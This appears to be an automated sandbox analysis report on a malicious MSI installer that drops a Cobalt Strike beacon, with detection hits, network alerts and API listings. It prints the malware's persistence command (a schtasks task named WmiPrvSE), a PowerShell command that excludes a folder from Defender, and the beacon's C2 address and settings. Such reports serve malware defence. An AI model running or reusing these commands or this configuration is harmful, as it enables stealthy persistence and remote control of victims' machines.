Source: Process started

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: SchTasks /Create /SC DAILY /TN WmiPrvSE /TR "C:\Users\Public\WmiPrvSE.exe" /ST 19:00 /f, CommandLine: SchTasks /Create /SC DAILY /TN WmiPrvSE /TR "C:\Users\Public\WmiPrvSE.exe" /ST 19:00 /f, CommandLine|base64offset|contains: ISj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\WmiPrvSE.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8020, ParentProcessName: cmd.exe, ProcessCommandLine: SchTasks /Create /SC DAILY /TN WmiPrvSE /TR "C:\Users\Public\WmiPrvSE.exe" /ST 19:00 /f, ProcessId: 7904, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -command "Add-MpPreference -ExclusionPath 'C:\Users\Public'", CommandLine: powershell -command "Add-MpPreference -ExclusionPath 'C:\Users\Public'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\WmiPrvSE.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8020, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "Add-MpPreference -ExclusionPath 'C:\Users\Public'", ProcessId: 8072, ProcessName: powershell.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:50:20.504465+0200
SID:	2028765
Source Port:	49727
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:50:24.645131+0200
SID:	2028765
Source Port:	49728
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:49:25.974308+0200
SID:	2028765
Source Port:	49709
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:50:58.207552+0200
SID:	2028765
Source Port:	49739
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:50:54.020089+0200
SID:	2028765
Source Port:	49738
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:52:15.502310+0200
SID:	2028765
Source Port:	49753
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:51:53.942300+0200
SID:	2028765
Source Port:	49752
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:51:15.363918+0200
SID:	2028765
Source Port:	49743
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:49:42.770077+0200
SID:	2028765
Source Port:	49716
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:50:12.223343+0200
SID:	2028765
Source Port:	49724
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:49:34.473035+0200
SID:	2028765
Source Port:	49713
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:51:36.661240+0200
SID:	2028765
Source Port:	49748
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:52:58.727770+0200
SID:	2028765
Source Port:	49756
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:51:40.974734+0200
SID:	2028765
Source Port:	49749
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:51:23.926397+0200
SID:	2028765
Source Port:	49745
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:49:59.569541+0200
SID:	2028765
Source Port:	49720
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:49:55.410705+0200
SID:	2028765
Source Port:	49719
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:51:10.957648+0200
SID:	2028765
Source Port:	49742
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:50:37.082541+0200
SID:	2028765
Source Port:	49734
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:50:08.067115+0200
SID:	2028765
Source Port:	49722
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:49:46.926281+0200
SID:	2028765
Source Port:	49717
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:49:38.629362+0200
SID:	2028765
Source Port:	49715
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:49:30.113760+0200
SID:	2028765
Source Port:	49710
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:51:02.382474+0200
SID:	2028765
Source Port:	49740
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:50:28.785697+0200
SID:	2028765
Source Port:	49729
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:51:32.287106+0200
SID:	2028765
Source Port:	49747
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:50:32.926309+0200
SID:	2028765
Source Port:	49730
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:51:28.113855+0200
SID:	2028765
Source Port:	49746
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:50:45.459277+0200
SID:	2028765
Source Port:	49736
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:50:03.723112+0200
SID:	2028765
Source Port:	49721
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:50:49.816896+0200
SID:	2028765
Source Port:	49737
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:51:45.348642+0200
SID:	2028765
Source Port:	49750
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:50:16.364615+0200
SID:	2028765
Source Port:	49725
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:51:49.770269+0200
SID:	2028765
Source Port:	49751
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:49:51.144968+0200
SID:	2028765
Source Port:	49718
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:50:41.254582+0200
SID:	2028765
Source Port:	49735
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:51:19.723963+0200
SID:	2028765
Source Port:	49744
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.8 - Destination IP: 45.76.192.215

Timestamp:	2024-08-04T10:51:06.582745+0200
SID:	2028765
Source Port:	49741
Destination Port:	59611
Protocol:	TCP
Classtype:	Unknown Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\Public\WmiPrvSE.exe

Avira: detection malicious, Label: HEUR/AGEN.1344321

Found malware configuration

Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 59611, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "45.76.192.215,/load", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\WmiPrvSE.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	ReversingLabs: Detection: 47%

Multi AV Scanner detection for submitted file

Source: 1eSOBjseu2.msi	Virustotal: Detection: 32%			Perma Link
Source: 1eSOBjseu2.msi	ReversingLabs: Detection: 42%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.1% probability

Machine Learning detection for dropped file

Source: C:\Users\Public\WmiPrvSE.exe

Joe Sandbox ML: detected

Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_00761184 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	23_2_00761184
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_00792020 CryptGenRandom,	23_2_00792020
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_00792010 CryptReleaseContext,	23_2_00792010

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\Public\WmiPrvSE.exe

Unpacked PE file: 23.2.WmiPrvSE.exe.760000.2.unpack

Source:	Binary string: b.pdb>w source: powershell.exe, 0000000D.00000002.1527530521.000000000279D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\aipackagechainer.pdb source: aipackagechainer.exe, 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmp, aipackagechainer.exe, 00000004.00000000.1428985582.00000000000FE000.00000002.00000001.01000000.00000003.sdmp, 1eSOBjseu2.msi, aipackagechainer.exe.3.dr, 643ea8.msi.2.dr, 643eab.msi.2.dr
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 0000000B.00000002.1536757222.0000000007B39000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdbOS= source: powershell.exe, 0000000D.00000002.1566035270.0000000006E85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: HP<oXC:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1565225176.0000000006A69000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1576734611.00000000076B9000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1583062786.00000000069D9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 0000000F.00000002.1581398989.0000000007B3E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ?\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000B.00000002.1536757222.0000000007B39000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: 1eSOBjseu2.msi, MSI44AA.tmp.2.dr, MSI40EF.tmp.2.dr, 643ea8.msi.2.dr, 643eab.msi.2.dr
Source:	Binary string: tomation.pdbk source: powershell.exe, 00000011.00000002.1530812316.00000000029AB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: Desktop.exe, 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmp, Desktop.exe, 00000005.00000000.1431460900.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmp, Desktop.exe, 00000005.00000003.1434163995.000002EF11318000.00000004.00000020.00020000.00000000.sdmp, Desktop.exe, 00000005.00000003.1433314174.000002EF12A71000.00000004.00000020.00020000.00000000.sdmp, 1eSOBjseu2.msi, Desktop.exe.3.dr, 643ea8.msi.2.dr, 643eab.msi.2.dr
Source:	Binary string: pdbpdblib.pdb=e\fo source: powershell.exe, 0000000D.00000002.1566035270.0000000006E85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .textn.pdb ` source: powershell.exe, 0000000F.00000002.1581398989.0000000007B00000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: 1eSOBjseu2.msi, MSI3FB2.tmp.2.dr, MSI4080.tmp.2.dr, MSI4020.tmp.2.dr, MSI40BF.tmp.2.dr, MSI4060.tmp.2.dr, 643ea8.msi.2.dr, 643eab.msi.2.dr

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: c:
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_0007A1F0 FindFirstFileW,CreateFileW,SetFilePointer,ReadFile,CloseHandle,FindCloseChangeNotification,GetModuleFileNameW,SetCurrentDirectoryW,OpenMutexW,GetLastError,WaitForSingleObject,CloseHandle,CloseHandle,FindClose,	4_2_0007A1F0
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_0007C450 DeleteFileW,FindFirstFileW,FindNextFileW,FindClose,PathIsDirectoryW,	4_2_0007C450
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_00084AF0 FindFirstFileW,GetLastError,FindClose,	4_2_00084AF0
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_00091870 FindFirstFileW,FindClose,FindClose,	4_2_00091870
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000A60A0 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,	4_2_000A60A0
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000E4329 FindFirstFileExW,	4_2_000E4329
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000A48F0 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,	4_2_000A48F0
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000A4CC0 FindFirstFileW,FindClose,	4_2_000A4CC0
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_0009CE70 FindFirstFileW,FindClose,	4_2_0009CE70
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000619C0 FindFirstFileW,FindNextFileW,FindClose,	4_2_000619C0
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_00081D00 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,_wcsrchr,_wcsrchr,	4_2_00081D00
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_00085E00 FindFirstFileW,FindClose,	4_2_00085E00
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB2440BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	5_2_00007FF7BB2440BC
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB25B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	5_2_00007FF7BB25B190
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB26FCA0 FindFirstFileExA,	5_2_00007FF7BB26FCA0
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_00779220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,	23_2_00779220
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_00771C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,	23_2_00771C30

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe

Code function: 4_2_000A3790 _wcsrchr,_wcsrchr,GetLogicalDriveStringsW,GetDriveTypeW,Wow64DisableWow64FsRedirection,Wow64RevertWow64FsRedirection,

4_2_000A3790

Source: C:\Users\Public\WmiPrvSE.exe

Code function: 4x nop then sub rsp, 28h

23_2_00402314

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 45.76.192.215

Source: global traffic

TCP traffic: 192.168.2.8:49709 -> 45.76.192.215:59611

Source: Joe Sandbox View

ASN Name: AS-CHOOPAUS AS-CHOOPAUS

Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.192.215

Source: C:\Users\Public\WmiPrvSE.exe

Code function: 23_2_0076E68C _snprintf,_snprintf,_snprintf,HttpOpenRequestA,HttpSendRequestA,InternetQueryDataAvailable,InternetCloseHandle,InternetReadFile,InternetCloseHandle,

23_2_0076E68C

Source: WmiPrvSE.exe, 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:%u/
Source: powershell.exe, 0000000B.00000002.1538195254.0000000007BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1516318919.0000000003628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000009.00000002.1569405040.0000000002736000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
